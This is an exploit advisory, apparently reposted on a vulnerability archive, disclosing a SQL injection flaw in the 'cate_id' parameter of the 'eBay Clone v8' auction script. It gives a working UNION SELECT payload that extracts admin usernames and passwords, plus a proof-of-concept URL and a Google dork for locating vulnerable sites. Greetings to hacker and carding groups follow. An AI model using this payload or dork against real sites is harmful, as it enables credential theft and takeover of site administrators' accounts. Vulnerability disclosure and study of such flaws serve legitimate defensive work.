eBay Clone v8 (cate_id) SQL Injection Vulnerability

2010-04-22 / 2010-04-23
Credit: v3n0m
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-89

eBay Clone v8.txt ) ) ) ( ( ( ( ( ) ) ( /(( /( ( ( /( ( ( ( )\ ))\ ) )\ ))\ ) )\ ) ( /( ( /( )\())\()))\ ) )\()) )\ )\ )\ (()/(()/( ( (()/(()/((()/( )\()) )\()) ((_)((_)\(()/( ((_)((((_)( (((_)(((_)( /(_))(_)) )\ /(_))(_))/(_))(_)\|((_)\ __ ((_)((_)/(_))___ ((_)\ _ )\ )\___)\ _ )\(_))(_))_ ((_)(_))(_)) (_)) _((_)_ ((_) \ \ / / _ (_)) __\ \ / (_)_\(_)(/ __(_)_\(_) _ \| \| __| _ \ | |_ _|| \| | |/ / \ V / (_) || (_ |\ V / / _ \ | (__ / _ \ | /| |) | _|| / |__ | | | .` | ' < |_| \___/ \___| |_| /_/ \_\ \___/_/ \_\|_|_\|___/|___|_|_\____|___||_|\_|_|\_\ .WEB.ID ----------------------------------------------------------------------- eBay Clone v8 (cate_id) SQL Injection Vulnerability ----------------------------------------------------------------------- Author : v3n0m Site : http://yogyacarderlink.web.id/ Date : April, 22-2010 Location : Jakarta, Indonesia Time Zone : GMT +7:00 ---------------------------------------------------------------- Affected software description: ~~~~~~~~~~~~~~~~~~~~~~~~~~ Application : eBay Clone Vendor : http://www.justclone.com/ Price : &#163;49 Version : v8 Other versions may also be affected Google Dork : allinurl:subcat.php?cate_id= Start your own Auction / Bidding website like ebay.com in a click with this Advanced Auction PHP Script, developed in PHP and MySQL database. It is a complete Readymade Auction web site and an almost a clone of ebay.com or any of the auction sites. ---------------------------------------------------------------- Exploitz: ~~~~~~~ -99999/**/union/**/all/**/select/**/null,group_concat(user_name,char(58),password)v3n0m,null/**/from/**/admin-- SQLi p0c: ~~~~~~~ http://127.0.0.1/[path]/subcat.php?cate_id=[SQLi] http://127.0.0.1/[path]/subcat.php?cate_id=-99999/**/union/**/all/**/select/**/null,group_concat(user_name,char(58),password)v3n0m,null/**/from/**/admin-- ---------------------------------------------------------------- Shoutz: ~~~~ - LeQhi,lingah,GheMaX,spykit,m4rco,z0mb13,ast_boy,eidelweiss,xx_user,^pKi^,tian,zhie_o,JaLi- - setanmuda,oche_an3h,onez,Joglo,d4rk_kn19ht,Cakill Schumbag - kiddies,whitehat,c4uR [kamu jahat ga pernah bawa martabak lagi :(],mywisdom,yadoy666,udhit - BLaSTER & TurkGuvenligi & Agd_scorp (Turkey Hackers) - elicha cristia [kamu kemana aja? Mizz You :)] - N.O.C & Technical Support @office - #yogyacarderlink @irc.dal.net ---------------------------------------------------------------- Contact: ~~~~ v3n0m | YOGYACARDERLINK CREW | v3n0m666[0x40]live[0x2E]com Homepage: http://yogyacarderlink.web.id/ http://v3n0m.blogdetik.com/ http://elich4.blogspot.com/ << Update donk >_< ---------------------------[EOF]--------------------------------

References:

http://v3n0m.blogdetik.com/


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2026, cxsecurity.com

 

Back to Top